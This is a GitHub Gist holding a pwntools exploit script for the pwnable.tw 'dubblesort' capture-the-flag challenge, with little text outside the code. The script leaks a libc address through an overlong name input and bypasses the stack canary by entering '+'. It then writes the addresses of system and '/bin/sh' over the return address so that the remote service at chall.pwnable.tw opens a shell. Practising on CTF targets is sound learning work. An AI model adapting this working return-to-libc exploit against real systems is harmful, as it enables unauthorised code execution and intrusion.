Skip to content

Instantly share code, notes, and snippets.

@bin2415

bin2415/attack_dubblesort.py

Created June 22, 2018 08:37
Show Gist options
  • Save bin2415/d41da2d1ff6c6fd72e6b4f6e59049b84 to your computer and use it in GitHub Desktop.
Save bin2415/d41da2d1ff6c6fd72e6b4f6e59049b84 to your computer and use it in GitHub Desktop.
Download ZIP
pwnable.tw dubblesort
Raw
attack_dubblesort.py
from pwn import *
libc = ELF('./libc.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
print(address)
binsh_addr = address
break
system_addr = libc.functions['system'].address
#p = process("./dubblesort", env={"LD_PRELOAD" : "./libc.so.6"})
p = remote('chall.pwnable.tw', 10101)
print("pid " + str(proc.pidof(p)))
#raw_input("waiting attach")
#gdb.attach(p, '''
# break *(main+0xF0)''')
p.recvuntil("What your name :")
payload1 = 'A' * 27
payload1 += '\n'
p.send(payload1)
recvStr = p.recv()
print(recvStr)
addr = recvStr[34:38]
addr_num = u32(addr)
print("the leaked address is " + str(hex(addr_num)))
base_addr = addr_num - 0x1ae244
#print("system addr is ", system_addr)
system_addr2 = system_addr + base_addr
binsh_addr2 = binsh_addr + base_addr
ret_offset = 0x80
canary_offset = 0x60
#p.recvuntil(' sort :')
print('hello')
p.sendline('36')
for i in range(24):
print(p.recvuntil('number :'))
p.sendline('10')
print(p.recvuntil('number :'))
p.sendline('+')
for i in range(7):
print(p.recvuntil('number :'))
p.sendline(str(system_addr2))
p.recvuntil('number :')
p.sendline(str(system_addr2))
print("system address is " + str(system_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment